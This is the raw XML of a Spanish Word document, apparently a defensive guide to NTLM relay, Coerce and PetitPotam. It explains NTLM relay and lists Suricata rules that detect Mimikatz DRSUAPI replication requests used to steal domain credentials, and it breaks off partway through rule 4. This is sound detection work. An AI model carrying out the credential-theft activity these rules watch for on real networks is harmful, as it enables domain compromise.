    <w:p w14:paraId="69907EC5" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="590D7622" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="048767B0" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="215F127F" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E6A9D8C" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BA6B2CE" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07F5AE74" w14:textId="77777777" w:rsidR="006A17E1" w:rsidRDefault="006A17E1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="639D8FFB" w14:textId="77777777" w:rsidR="00AE6362" w:rsidRDefault="00AE6362" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50E18F0A" w14:textId="05D635F9" w:rsidR="009628A4" w:rsidRDefault="00B72A79" w:rsidP="00B72A79">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc135575992"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Defensa General de Coerce y PetitPotam Mitigación de ataques NTLM:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="47716410" w14:textId="77777777" w:rsidR="009628A4" w:rsidRDefault="009628A4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BF3463E" w14:textId="5B096263" w:rsidR="005679E0" w:rsidRDefault="005679E0" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enlace a la información de Microsoft: </w:t>
      </w:r>
      <w:hyperlink r:id="rId208" w:history="1">
        <w:r w:rsidRPr="0017333D">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://support.microsoft.com/en-gb/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DABC1EE" w14:textId="77777777" w:rsidR="009628A4" w:rsidRDefault="009628A4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42B151CF" w14:textId="52FA1B1C" w:rsidR="009628A4" w:rsidRDefault="00B72A79" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Lo primero que voy hacer es explicar que es un ataque de NTLM relay y que es NTLM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F10107C" w14:textId="77777777" w:rsidR="009628A4" w:rsidRDefault="009628A4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ACB50A4" w14:textId="77777777" w:rsidR="009628A4" w:rsidRDefault="009628A4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DC27131" w14:textId="77777777" w:rsidR="00B72A79" w:rsidRDefault="00B72A79" w:rsidP="00B72A79">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>NTLM (NT LAN Manager) es un protocolo de autenticación utilizado por sistemas operativos Windows para autenticar usuarios y servicios. En este protocolo, el cliente y el servidor intercambian mensajes para establecer la identidad del usuario que intenta acceder al sistema. El proceso de autenticación NTLM implica la verificación de las credenciales del usuario, como su nombre de usuario y contraseña.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777D0DB5" w14:textId="77777777" w:rsidR="00B72A79" w:rsidRDefault="00B72A79" w:rsidP="00B72A79">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1383DFB4" w14:textId="77777777" w:rsidR="00B72A79" w:rsidRDefault="00B72A79" w:rsidP="00B72A79">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Un ataque NTLM relay es una técnica de ataque que aprovecha una debilidad en el protocolo NTLM. En un ataque NTLM relay, un atacante intercepta el tráfico de autenticación entre un cliente y un servidor y lo retransmite a otro servidor en la red. El atacante puede hacerse pasar por el servidor de destino para engañar al cliente y obtener sus credenciales de autenticación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4529B51D" w14:textId="77777777" w:rsidR="00B72A79" w:rsidRDefault="00B72A79" w:rsidP="00B72A79">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C15E044" w14:textId="77777777" w:rsidR="00B72A79" w:rsidRDefault="00B72A79" w:rsidP="00B72A79">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>El ataque funciona de la siguiente manera: el atacante intercepta el tráfico de autenticación NTLM entre el cliente y el servidor, y en lugar de intentar descifrar las credenciales de autenticación, retransmite los mensajes de autenticación al servidor legítimo en la red. El servidor legítimo responde con un desafío, que el atacante envía al cliente. El cliente responde con una respuesta de autenticación, que el atacante retransmite al servidor legítimo. El servidor legítimo autentica al usuario y envía una respuesta de autenticación al atacante, quien puede hacerse pasar por el cliente autenticado y acceder a los recursos de la red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E497C87" w14:textId="77777777" w:rsidR="00B72A79" w:rsidRDefault="00B72A79" w:rsidP="00B72A79">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3391C525" w14:textId="39E55599" w:rsidR="009628A4" w:rsidRDefault="005679E0" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora mostraré unas reglas de suricata para detectar este tipos de ataques</w:t>
      </w:r>
      <w:r w:rsidR="00163A4D">
        <w:t>, estas reglas estarán explicadas detalladamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E674608" w14:textId="77777777" w:rsidR="00C97A27" w:rsidRDefault="00C97A27" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="269051FC" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRPr="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09A5F110" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRPr="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A1DE7">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. Regla: `alert tcp $WORKSTATIONS any -&gt; $DCS any (msg:"Mimikatz DRSUAPI"; flow:established,to_server; content:"|05 00 0b|"; depth:3; content:"|35 42 51 e3 06 4b d1 11 ab 04 00 c0 4f c2 dc d2|"; depth:100; flowbits:set,drsuapi; flowbits:noalert; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000010; rev:1;)`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1DB559" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRPr="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14C2FC90" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRPr="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="006A1DE7">
        <w:t>Esta regla está diseñada para detectar actividades relacionadas con la herramienta de hacking Mimikatz a través del protocolo DRSUAPI. A continuación se detalla la explicación de la regla:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175FE300" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRPr="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="549443CD" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRPr="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="006A1DE7">
        <w:t>- La regla se activa cuando se detecta tráfico TCP proveniente de las estaciones de trabajo (`$WORKSTATIONS`) hacia los controladores de dominio (`$DCS`) en cualquier puerto destino.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F9F047" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRPr="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="006A1DE7">
        <w:t>- El mensaje de la regla (`msg`) es "Mimikatz DRSUAPI".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D83C7B5" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRPr="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="006A1DE7">
        <w:t>- La regla verifica que el flujo esté establecido hacia el servidor (`flow:established,to_server`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53914484" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRPr="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="006A1DE7">
        <w:t>- Se busca la secuencia hexadecimal `05 00 0b` en los primeros 3 bytes del contenido del paquete (`content:"|05 00 0b|"; depth:3`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FE6D06" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRPr="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="006A1DE7">
        <w:t>- Se busca la secuencia hexadecimal `35 42 51 e3 06 4b d1 11 ab 04 00 c0 4f c2 dc d2` de hasta 100 bytes después del primer contenido encontrado (`content:"|35 42 51 e3 06 4b d1 11 ab 04 00 c0 4f c2 dc d2|"; depth:100`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A93653" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRPr="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="006A1DE7">
        <w:t>- Se establece el flujo de bits `drsuapi` (`flowbits:set,drsuapi`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B96025E" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRPr="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="006A1DE7">
        <w:t>- Se evita generar alertas adicionales en relación con los bits de flujo (`flowbits:noalert`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E59F6C" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRPr="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="006A1DE7">
        <w:t>- Se proporciona una referencia a la URL del blog didierstevens.com (`reference:url,blog.didierstevens.com`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5821D2D1" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRPr="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="006A1DE7">
        <w:t>- La clasificación de la regla (`classtype`) es una violación de política (`policy-violation`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A17AF0" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRPr="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="006A1DE7">
        <w:t>- El identificador de la regla (`sid`) es 1000010.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BD6813" w14:textId="5CB4CCED" w:rsidR="00C97A27" w:rsidRDefault="006A1DE7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="006A1DE7">
        <w:t>- La revisión de la regla (`rev`) es 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EFEDD0" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="135AE5D8" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2130547B" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRPr="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A1DE7">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>2. Regla: `alert tcp $WORKSTATIONS any -&gt; $DCS any (msg:"Mimikatz DRSUAPI DsGetNCChanges Request";flow:established,to_server;flowbits:isset,drsuapi; content:"|05 00 00|"; depth:3; content:"|03 00|"; offset:22; depth:2;reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000011; rev:1;)`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5625B153" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F10914B" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Esta regla está diseñada para detectar solicitudes de cambio de nombre de contexto en el protocolo DRSUAPI relacionadas con Mimikatz. A continuación se detalla la explicación de la regla:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A2E9C6" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39EF30C3" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La regla se activa cuando se detecta tráfico TCP proveniente de las estaciones de trabajo (`$WORKSTATIONS`) hacia los controladores de dominio (`$DCS`) en cualquier puerto destino.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282E8EE5" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- El mensaje de la regla (`msg`) es "Mimikatz DRSUAPI DsGetNCChanges Request".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2CA9CE" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La regla verifica que el flujo esté establecido hacia el servidor (`flow:established,to_server`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557B09AB" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se verifica si el flujo de bits `drsuapi` está configurado (`flowbits:isset,drsuapi`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2ECA0C" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se busca la secuencia hexadecimal `05 00 00` en los primeros 3 bytes del contenido del paquete (`content:"|05 00 00|"; depth:3`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0A21E6" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se busca la secuencia hexadecimal `03 00` 2 bytes después de la posición 22 (`content:"|03 00|"; offset:22; depth:2`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C351FD" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se proporciona una referencia a la URL del blog didierstevens.com (`reference:url,blog.didierstevens.com`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2D4428" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La clasificación de la regla (`classtype`) es una violación de política (`policy-violation`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9C85ED" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- El identificador de la regla (`sid`) es 1000011.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCAB54D" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La revisión de la regla (`rev`) es 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9A53DE" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44E70634" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DE5D606" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRPr="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A1DE7">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>3. Regla: `alert tcp $WORKSTATIONS any -&gt; $DCS any (msg:"Mimikatz Mimikatz DRSUAPI DRSUAPI_REPLICA_ADD Request"; flow:established,to_server; flowbits:isset,drsuapi; content:"|05 00 00|"; depth:3; content:"|05 00|"; offset:22; depth:2; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000014; rev:1;)`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25509BEB" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="207A440A" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Esta regla está diseñada para detectar solicitudes de añadir réplicas en el protocolo DRSUAPI relacionadas con Mimikatz. A continuación se detalla la explicación de la regla:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D90F9EB" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DD06E63" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La regla se activa cuando se detecta tráfico TCP proveniente de las estaciones de trabajo (`$WORKSTATIONS`) hacia los controladores de dominio (`$DCS`) en cualquier puerto destino.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1027806B" w14:textId="4AF3B8A0" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- El mensaje de la regla (`msg`) es "Mimikatz DRSUAPI DRSUAPI_REPLICA_ADD Request".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5676420A" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La regla verifica que el flujo esté establecido hacia el servidor (`flow:established,to_server`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D06A2E" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>- Se verifica si el flujo de bits `drsuapi` está configurado (`flowbits:isset,drsuapi`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03861372" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se busca la secuencia hexadecimal `05 00 00` en los primeros 3 bytes del contenido del paquete (`content:"|05 00 00|"; depth:3`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A4C0C0" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se busca la secuencia hexadecimal `05 00` 2 bytes después de la posición 22 (`content:"|05 00|"; offset:22; depth:2`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50835267" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se proporciona una referencia a la URL del blog didierstevens.com (`reference:url,blog.didierstevens.com`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FD0C4A" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La clasificación de la regla (`classtype`) es una violación de política (`policy-violation`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECD48AC" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- El identificador de la regla (`sid`) es 1000014.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2469EDDD" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La revisión de la regla (`rev`) es 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED70909" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="163494DF" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A3FE602" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRPr="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A1DE7">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>4. Regla: `alert tcp $WORKSTATIONS any -&gt; $DCS any (msg:"Mimikatz DRSUAPI DsGetNCChanges Request"; flow:established,to_server; flowbits:isset,drsuapi; content:"|05 00 00|"; depth:3; byte_test:1,&gt;=,0x10,4; byte_test:1,&lt;=,0x11,4; content:"|03 00|"; offset:22; depth:2; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000012; rev:1;)`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0067C102" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27641AF5" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Esta regla está diseñada para detectar solicitudes de cambio de nombre de contexto específicas en el protocolo DRSUAPI relacionadas con Mimikatz. A continuación se detalla la explicación de la regla:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466AE972" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E8A845F" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La regla se activa cuando se detecta tráfico TCP proveniente de las estaciones de trabajo (`$WORKSTATIONS`) hacia los controladores de dominio (`$DCS`) en cualquier puerto destino.</w:t>
      </w:r>
    </w:p>
